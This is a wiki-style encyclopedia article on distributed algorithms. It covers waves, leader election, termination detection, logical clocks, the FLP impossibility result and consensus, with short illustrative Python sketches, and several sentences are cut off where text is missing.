Distributed Algorithm
From CasGroup
A '''distributed algorithm''' is a decentralized algorithm that is executed in a [[Distributed System|distributed system]], on more than one machine, node or processor.

A distributed algorithm for a collection P of processes is, according to Gerard Tel in his book ''Introduction to Distributed Algorithms'', simply a collection of local algorithms, one for each process in P. In his earlier work ''Topics in Distributed Algorithms'' he defined it as follows: "a distributed algorithm executes as a collection of sequential processes, all executing their part of the algorithm independently, but coordinating their activity through communication." Nancy A. Lynch argues: "Distributed algorithms are algorithms designed to run on hardware consisting of many interconnected processors. The algorithms are supposed to work correctly, even if the individual processors and communication channels operate at different speeds and even if some of the components fail."

In sequential algorithms, steps are taken in a strict sequence and in a well-defined order. In distributed systems

be considered as a wave for a ring topology. The importance of waves is not surprising, since a wave is one of the most basic forms of [[Emergence|emergence]] in a system. If all nodes are visited sequentially, or an action like "inform all" or "query all" is required, a kind of wave must be used. Fundamental algorithms where all nodes of a network are visited are [[Total Algorithm]]s and [[Heart Beat Algorithm]]s.
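The effect of a wave that visits every node can be illustrated with a small flooding simulation (a minimal sketch; the graph, the ring topology and the simulation structure are illustrative assumptions, not a specific algorithm from the literature):

```python
from collections import deque

def flood(graph, initiator):
    """Simulate a flooding wave: the initiator sends a token to its
    neighbours, and every node that receives the token for the first
    time forwards it to all of its neighbours.
    Returns the set of visited nodes and the number of messages sent."""
    visited = {initiator}
    messages = 0
    queue = deque([initiator])
    while queue:
        node = queue.popleft()
        for neighbour in graph[node]:
            messages += 1                # each forwarded token is one message
            if neighbour not in visited:
                visited.add(neighbour)
                queue.append(neighbour)
    return visited, messages

# An assumed example topology: a ring of four nodes.
ring = {0: [1, 3], 1: [0, 2], 2: [1, 3], 3: [0, 2]}
nodes, msgs = flood(ring, 0)             # every node is visited
```

Every node is reached, and the message count equals the number of directed edges, which is the typical cost of a simple wave.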
A common problem besides "inform all" and "query all" is "select one", "elect one", "admit one", etc. The resulting algorithms are named [[Election Algorithm|election algorithms]], where a single node or process (for example the leader) that is to play a distinguished role in a subsequent computation must
avoided.
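A classic election algorithm for ring topologies is the Chang-Roberts algorithm: every node sends its (unique) identifier clockwise, forwards received identifiers larger than its own, discards smaller ones, and the node that receives its own identifier back is elected. A minimal round-based simulation (a sketch; the identifiers and the synchronous round structure are illustrative assumptions):

```python
def chang_roberts(ids):
    """Simulate Chang-Roberts leader election on a unidirectional ring.
    ids[i] is the unique identifier of the node at ring position i.
    Returns the identifier of the elected leader."""
    n = len(ids)
    in_transit = list(ids)        # each node starts by sending its own id
    while True:
        nxt = [None] * n
        for pos in range(n):
            token = in_transit[pos]
            if token is None:
                continue
            receiver = (pos + 1) % n
            if token == ids[receiver]:
                return token            # own id came back: elected as leader
            if token > ids[receiver]:
                nxt[receiver] = token   # forward larger ids
            # smaller ids are silently discarded
        in_transit = nxt

leader = chang_roberts([3, 1, 4, 2])    # the largest id wins
```

Only the largest identifier survives a full trip around the ring, so its owner becomes the leader.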
Finally, it is a problem to determine and change the "global state" or the "global order"; the associated
distributed algorithms are named [[Termination Detection|termination detection]], where the end of a distributed computation has to be detected, and distributed [[garbage collection]], where unused memory and references must be released. A basic "toy" algorithm used to explain distributed algorithms in classes is the [[Distributed GCD Algorithm|distributed GCD algorithm]].
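One common way to formulate such a toy algorithm (a sketch under assumed semantics, not necessarily the exact algorithm behind the link above): every node holds a number, repeatedly sends it to all neighbours, and replaces its value with the gcd of its own value and the values it receives; the computation stabilizes when every node holds the gcd of all initial values, and detecting that stabilization is itself a termination detection problem.

```python
import math
from functools import reduce

def distributed_gcd(graph, values):
    """Round-based simulation: in each round every node sends its value
    to all neighbours, then combines the received values with gcd.
    Runs until no value changes and returns the stable values."""
    values = dict(values)
    while True:
        inbox = {node: [] for node in graph}
        for node, neighbours in graph.items():
            for nb in neighbours:
                inbox[nb].append(values[node])
        new = {node: reduce(math.gcd, inbox[node], values[node])
               for node in graph}
        if new == values:
            return values
        values = new

# An assumed example: three fully connected nodes.
final = distributed_gcd({0: [1, 2], 1: [0, 2], 2: [0, 1]},
                        {0: 12, 1: 18, 2: 30})
```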
=== Problem Fields ===
Termination detection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is "consistent" if it appears as if it were taken at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of "logical time" or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but real time is uniformly continuous, whereas logical time can have discontinuous jumps. These methods are nevertheless problematic, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this approach ignores "the different failure modes and basic indeterminacy inherent in distributed computing" and leads to systems that are neither reliable nor scalable.

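Lamport's logical clocks mentioned above fit in a few lines (a minimal sketch; the class and method names are illustrative assumptions): each process keeps a counter, increments it on every local event, attaches it to outgoing messages, and on receipt jumps past the received timestamp.

```python
class LamportClock:
    """Minimal Lamport logical clock for a single process."""

    def __init__(self):
        self.time = 0

    def tick(self):
        """Advance the clock for a local event."""
        self.time += 1
        return self.time

    def send(self):
        """Timestamp an outgoing message (sending is an event)."""
        return self.tick()

    def receive(self, msg_time):
        """Jump past the message's timestamp, then count the receive event."""
        self.time = max(self.time, msg_time)
        return self.tick()

# An assumed two-process exchange: the send gets a smaller timestamp
# than the receive, reflecting the happened-before relation.
p, q = LamportClock(), LamportClock()
t_send = p.send()
t_recv = q.receive(t_send)
```

The jump in `receive` is exactly the discontinuity that distinguishes logical time from real time.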
Thus we have roughly the following problem fields:
=== Impossibility Results ===
Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. A single faulty process can already render any guarantee of reaching a common consensus impossible, as the famous "FLP impossibility result" says. The "FLP impossibility result" from Fischer, Lynch and Paterson says that it is impossible to guarantee consensus in a distributed, asynchronous system if even one process is faulty. More precisely, there is no guarantee that a common consensus can be reached if a faulty process exists. This is intuitively plausible, since a faulty process that no longer responds is indistinguishable from a process that merely answers slowly (given an arbitrary time delay in the connections of the asynchronous network).

Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problems in [[Distributed Computing|distributed computing]]: several processes have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be committed or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in Chapter 12, "Consensus", of her book), "the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all."
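The impossibility result only concerns asynchronous systems; in a synchronous system with at most f crash failures, the classic flooding algorithm reaches consensus in f + 1 rounds. A minimal failure-free simulation (a sketch; the inputs and the decision rule of taking the minimum are illustrative assumptions):

```python
def flooding_consensus(initial_values, rounds):
    """Synchronous flooding consensus under the crash-failure model
    (no crash occurs in this simulated run): for a fixed number of
    rounds every process broadcasts the set of values it knows about;
    afterwards each process decides on the minimum value it has seen."""
    known = [{v} for v in initial_values]
    for _ in range(rounds):
        heard = set().union(*known)       # all broadcasts are delivered
        known = [k | heard for k in known]
    return [min(k) for k in known]

# Three processes propose different values and all decide the same one.
decisions = flooding_consensus([7, 3, 9], rounds=2)
```

With f possible crashes, f + 1 rounds guarantee one round in which no process crashes, after which all surviving processes know the same set of values.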
== Proof and Verification ==
The traditional definitions of liveness and safety are:
* '''Liveness''' means "something good will eventually occur" or "something good eventually happens"
* '''Safety''' means "something bad will never happen" or "no bad thing ever happens"

Liveness and safety are two complementary properties, one says that
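On a finite execution trace the asymmetry between the two properties can be sketched as follows (a rough sketch; formal definitions quantify over infinite executions, and the event names are illustrative assumptions): a finite trace can prove a safety violation, but can only ever witness, never refute, a liveness property.

```python
def violates_safety(trace, bad):
    """Safety ("no bad thing ever happens") is violated as soon as
    some finite prefix contains a bad event."""
    return any(bad(event) for event in trace)

def witnesses_liveness(trace, good):
    """Liveness ("something good eventually happens") can be witnessed
    by a finite trace, but never refuted: the good event might still
    occur in the unseen future."""
    return any(good(event) for event in trace)

# An assumed example trace of a mutual-exclusion run.
trace = ["request", "wait", "grant"]
safe_so_far = not violates_safety(trace, lambda e: e == "crash")
live = witnesses_liveness(trace, lambda e: e == "grant")
```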